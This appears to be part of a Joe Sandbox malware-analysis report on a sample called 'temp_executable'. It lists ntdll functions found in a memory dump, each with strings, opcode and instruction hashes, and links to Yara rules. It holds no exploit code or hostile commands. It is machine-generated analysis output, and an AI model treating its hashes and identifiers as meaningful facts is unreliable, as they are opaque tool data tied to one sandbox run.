Instruction Fuzzy Hash: 27C17A78508382CFE321CF68C540B5AB7E8FF85784F04496AF8958B691E778C949CF96

Function 3393265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 339720C0
.Local, xrefs: 339327F8
SXS: %s() passed the empty activation context, xrefs: 33971FE8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33971FE3, 339720BB

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
Instruction ID: 84b07dd1a1a9f4bd1515786f4673b520181b713ce4dadf474f3fe58e7c8eb92f
Opcode Fuzzy Hash: 7b34b962950f4a936e7d633fc347d610735d2cfd4f42c9db2cc281dff7ad8f01
Instruction Fuzzy Hash: 22A190B5D02329DBDB20CF64D884B99B3B9FF59364F1441E9D888AB291D7309E85CF90

Function 339063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33960E2F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33960EB5
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33960DEC
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33960E72

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
Instruction ID: 46aa41db766b72c63f9e14226a1cca7c61c25235850db069ffb7bccc2d4cc417
Opcode Fuzzy Hash: f294045b81b8315806f88567b9038dfd89a2cdf0ea6375d575b474808d499de4
Instruction Fuzzy Hash: 5571ADB1908304DFE760DF54C884B8B7BACEF857A4F4405A9F9888A647D735E588CF92

Function 338FF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3395E2F2
HEAP[%wZ]: , xrefs: 3395E18D
HEAP: , xrefs: 3395E2DD
`, xrefs: 3395E1B7

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
Instruction ID: ebb1f28731026a71ccc2c4743211d6c23ad11180b5a7ee44b37971b08d89a3ae
Opcode Fuzzy Hash: 835ee8c68381dc410894aba3842d9b108e9740607be532801303ec4a4c4d824c
Instruction Fuzzy Hash: C4612375A04384DFE312CBA4D844F57B7E8EF84B90F080559F9A48B6A2DB35E840CB66

Function 338F90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 3395B849
VirtualQuery Failed 0x%p %x, xrefs: 3395B886
HEAP[%wZ]: , xrefs: 3395B82F, 3395B86C
HEAP: , xrefs: 3395B83C, 3395B879

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: eef5d407df14267b2706e2df6a5f9531e9b4ea060354dd47e13dcc581a067ab7
Instruction ID: 6d20366a6eed87c60f46b10de0648432de035ca813bf411e255720e6c9373072
Opcode Fuzzy Hash: eef5d407df14267b2706e2df6a5f9531e9b4ea060354dd47e13dcc581a067ab7
Instruction Fuzzy Hash: C5310936A01208EFEB11DBD8DC84F9EB7B8EF45760F1440A5F524AB391D775D981CA60

Function 33907072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339615E0
RtlDebugPrintTimes.NTDLL ref: 339615F5

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 06c84314199089deb06c45cf0ddf3d933cf36d63406143b6e06ac370e2d95ed5
Instruction ID: 0fbda19a72d96d5970a566c5f4f63a7f4a9e4ec64b03cb0430b738c0cb687ea0
Opcode Fuzzy Hash: 06c84314199089deb06c45cf0ddf3d933cf36d63406143b6e06ac370e2d95ed5
Instruction Fuzzy Hash: E7510E34E00709EFEB05DB64C954BAEB7B8FF443A9F14826AE44297690DB70E911CF80

Function 33993608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

LdrpResSearchResourceHandle Enter, xrefs: 33993666
LdrpResSearchResourceHandle Exit, xrefs: 33993681
PE, xrefs: 339937D2

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 23cf0e884f1bb0fc9f317c699501657e3bf65f3b0ebdc3ce8ad0e8c881e9b5bb
Instruction ID: a8a88eea67f32490287363dfa16ffa9d9a1646399e1b6dc25f4447bd313ed6c7
Opcode Fuzzy Hash: 23cf0e884f1bb0fc9f317c699501657e3bf65f3b0ebdc3ce8ad0e8c881e9b5bb
Instruction Fuzzy Hash: 8BF15FB5A00329CBEB21CF19CCC0BD9B3B9AF48794F4481E9D949A7241E7319E85CF55

Function 33901380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33901648
HEAP[%wZ]: , xrefs: 33901632
HEAP: , xrefs: 339014B6

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 62fb6da3b9e253f0f652d60e06e760e18b3cd97db344235d0e9f2d539875275a
Instruction ID: 47dd12e9a3317556a9ae6c65b33502c6cc5c98b8b566257b3fa13bbf89a35247
Opcode Fuzzy Hash: 62fb6da3b9e253f0f652d60e06e760e18b3cd97db344235d0e9f2d539875275a
Instruction Fuzzy Hash: 7CE1EF78A04345DFEB29CF68C48067ABBE9EF48350F18895DE4D6CB286E734E941CB50

Function 3392F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 33970128
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 339700C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 339700F1

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: e00bc038d0cee2b2cd4db7e466e210d534f4caf9a27279754a9651a83c99f243
Instruction ID: d29d9c891ba2eacda9de7a38529c1bec656a51b7c7ca9f9d1e0c090a2b36dc6f
Opcode Fuzzy Hash: e00bc038d0cee2b2cd4db7e466e210d534f4caf9a27279754a9651a83c99f243
Instruction Fuzzy Hash: 69E18E74608B45DFE721CF28C840B1ABBE8FF843A4F140A59E5A6CB2E1D774D944CB42

Function 3390B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 3390B634
LdrResGetRCConfig Enter, xrefs: 3390B622
MUI, xrefs: 3390B5F8, 3390B707

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 91944cb6c2c4751c64df833e4976fdc2cd5fa1802c23dc5d0c74e6454b13ebbd
Instruction ID: c2303d9e47479acbb2decae69b64f513f4c88914db7cf448da5db1722a4aa316
Opcode Fuzzy Hash: 91944cb6c2c4751c64df833e4976fdc2cd5fa1802c23dc5d0c74e6454b13ebbd
Instruction Fuzzy Hash: 66B1AC75A12705CBDB25DF68C8D1B9DB7B9AF487A8F14452AE851EB7A0D730E940CF00

Function 338FA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 3395C075
\??\, xrefs: 3395BF73
UseFilter, xrefs: 338FA171

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 6e8f38be81065bdc3510e46c962b7eeac04c79992c9aa63e068a8cf07e4c64bc
Instruction ID: ce8c25beb8a0aed1b7077540d47fd49622d1bd09d8d2f7b68ec61cc29c92801b
Opcode Fuzzy Hash: 6e8f38be81065bdc3510e46c962b7eeac04c79992c9aa63e068a8cf07e4c64bc
Instruction Fuzzy Hash: 08A16976D01629DAEB21DB64CC88B9AB7B8EF04714F1001EAE909E7250DB359EC9CF50

Function 3399327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

@, xrefs: 339933F7
LdrpResMapFile Exit, xrefs: 339932B7
LdrpResMapFile Enter, xrefs: 339932A5

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 4781e6d9570832c491aca64fa98d364da24f2acf45c5a5e0672af6ac7d382f8b
Instruction ID: 22df43c4a4c21c6f1a5b31746f9f7c31b74dc06247aed06a5623cea7982a138b
Opcode Fuzzy Hash: 4781e6d9570832c491aca64fa98d364da24f2acf45c5a5e0672af6ac7d382f8b
Instruction Fuzzy Hash: D1819D75648340EFE311CF24C881BAAB7E8FF8C790F480929F9949B291DB74D900CB52

Function 3390B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

{, xrefs: 339635BD
LdrpResGetResourceDirectory Exit, xrefs: 3390B397
LdrpResGetResourceDirectory Enter, xrefs: 3390B385

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 461dd7539942c907826ec2e162d09d1a8680cd04023a89c5e3f4be96a9bb4b79
Instruction ID: 5962eb111f7b7d8251b1f0658f393f05faa965a58927c10db86e7133857868f2
Opcode Fuzzy Hash: 461dd7539942c907826ec2e162d09d1a8680cd04023a89c5e3f4be96a9bb4b79
Instruction Fuzzy Hash: E391CD75A05359CFEB21CF94C4907AEB7B8EF053A8F184199E854AB391D778DA80CF90

Function 339DB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 339DB3B4
TargetNtPath, xrefs: 339DB3AF
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 339DB3AA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 6334d34c5f50052816ee94773388f6d8d22feb2dae8a48b31143454032606163
Instruction ID: b3c9e54c9efdf126af1c57bcb661a7414c5ee316d32105f61dca830926653df5
Opcode Fuzzy Hash: 6334d34c5f50052816ee94773388f6d8d22feb2dae8a48b31143454032606163
Instruction Fuzzy Hash: DE619A72D4132DEBDB21DF54DC89B9AB7B8AB08750F4141E9E908AB250CB74DE84CF90

Function 338FF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 3395E435
HEAP: , xrefs: 3395E442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3395E455

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 2db477b0d95358205053574e5a02d26a40bbd10bac13db10e1a06ddb820cc2b8
Instruction ID: b1c00aae7a31a525682185c18b4ebfd151cafe988d54b1ce77f0e6640b1c2f67
Opcode Fuzzy Hash: 2db477b0d95358205053574e5a02d26a40bbd10bac13db10e1a06ddb820cc2b8
Instruction Fuzzy Hash: CF512335A04788EFF712CBE8D884F9ABBF8EF04344F0841A5E5919B6A2D775E950CB50

Function 33921514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 3396A39D
minkernel\ntdll\ldrmap.c, xrefs: 3396A3A7
Could not validate the crypto signature for DLL %wZ, xrefs: 3396A396

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: be49c2cf59428d1ede63a540b7e9b6a1194f84878c214bed232a3ebe567b6881
Instruction ID: 24ac94eaff15fd24c46a4b78039a6f6a0381125ae31c5182b8760e40baf5f201
Opcode Fuzzy Hash: be49c2cf59428d1ede63a540b7e9b6a1194f84878c214bed232a3ebe567b6881
Instruction Fuzzy Hash: AD5102B4B05B49DFE721CB68C840F1A7BE8AB447A4F140194E891DB7E6DB74E810CB40

Function 339AD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 339AD7B2
HEAP[%wZ]: , xrefs: 339AD792
HEAP: , xrefs: 339AD79F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 3094b3f0aef4a328f808df8345e589bba3f63bbf5d678ce58296d62198de1736
Instruction ID: d766e5419ee658186888597c7eaf67f73bbfd04b3852221c34902017c913649b
Opcode Fuzzy Hash: 3094b3f0aef4a328f808df8345e589bba3f63bbf5d678ce58296d62198de1736
Instruction Fuzzy Hash: 945142B8100350CEF368EE2DC86477273E9DF452C6F954A8AE4D58B681EA36D847DB60

Function 338F753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 3395AD5A
HEAP[%wZ]: , xrefs: 3395AD3A
HEAP: , xrefs: 3395AD47

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: d8fa7969948825bb89a12e68f629bb2563348fb19888d924e96aa263f774b77a
Instruction ID: 71abda4705b262f1068dcda877188f3ba5923718fb30402feb5fe917f077930c
Opcode Fuzzy Hash: d8fa7969948825bb89a12e68f629bb2563348fb19888d924e96aa263f774b77a
Instruction Fuzzy Hash: E2413679600380CFFB16DEACD480BB577E89F053C5F6844A9F4898BA52CB7AD485CB25

Function 339315EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33971943
minkernel\ntdll\ldrtls.c, xrefs: 33971954
LdrpAllocateTls, xrefs: 3397194A

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: d5e03b8c8b7264ace480d5356c28e293d3a5b05ae2ec8c00bb8e1eec99ecbbbc
Instruction ID: 467066c8d4452c9b992e08f2788391eb60aa745f782ac5fcdce5e6d2a5884a03
Opcode Fuzzy Hash: d5e03b8c8b7264ace480d5356c28e293d3a5b05ae2ec8c00bb8e1eec99ecbbbc
Instruction Fuzzy Hash: D54169B5E01309EFDB14DFA8C881AAEBBF5FF49350F048129E416A7752DB75A8018F50

Function 339332C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context data, xrefs: 33972808
Actx , xrefs: 339332CC
RtlCreateActivationContext, xrefs: 33972803

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 36442bcc7bfbcd501136ac4e56b1bd3da0ac6dd753d4fcb39beebd827a05ab28
Instruction ID: 92ab7ca6fab86057142e5533ed4f1d3c6dc2adf03063bfa2b343dea057b6bad0
Opcode Fuzzy Hash: 36442bcc7bfbcd501136ac4e56b1bd3da0ac6dd753d4fcb39beebd827a05ab28
Instruction Fuzzy Hash: 8E31F2B2A42305DFEB15CE68D8D0B9A37E8EF49760F598469FC049F292CB71D805CB91

Function 3398B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 3398B30F
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3398B2B2
@, xrefs: 3398B2F0

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 44710df7524bd91f739bf88ed464712fac367bc5c68584a1976fc8306fb2b9c3
Instruction ID: 9ae928467d7c3f166a16b22e09d3b26564713300aefa7cc41506ab989b8a94cb
Opcode Fuzzy Hash: 44710df7524bd91f739bf88ed464712fac367bc5c68584a1976fc8306fb2b9c3
Instruction Fuzzy Hash: 65312FB5D0120DEEDB10DF94DC80AEEBBBCEF44784F44046AE615EB241D7749E448B94

Function 33931527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrtls.c, xrefs: 3397185B
DLL "%wZ" has TLS information at %p, xrefs: 3397184A
LdrpInitializeTls, xrefs: 33971851

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 37843c13761f60be1fb4bf2ebd5524da4a62a4b5dee78b9894cf35817ded7c19
Instruction ID: 111838477200fdfc41d2f0011bb41a6bcce242733b1aeae27e6b3f3fd1f52a40
Opcode Fuzzy Hash: 37843c13761f60be1fb4bf2ebd5524da4a62a4b5dee78b9894cf35817ded7c19
Instruction Fuzzy Hash: DA3108B2E01304EBF720AB94CC81F5A7BBCEF463A6F050119E402BB2A1DB74ED458790

Function 33941190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3394119B
@, xrefs: 339411C5
BuildLabEx, xrefs: 3394122F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: 0ef2384e43e303364405f5f06725f799b8292a3264069bba557c8875555babfc
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: 823150B6D01719FBDB11DB95CC44EAEBB7DEF84654F404025E914E72A1DB30DA058BA0

Function 339885AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 339885DE

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 837640e12625bca4aa523b1b017c493f6c4fe728a8a4c6122203b5324d6ebfaf
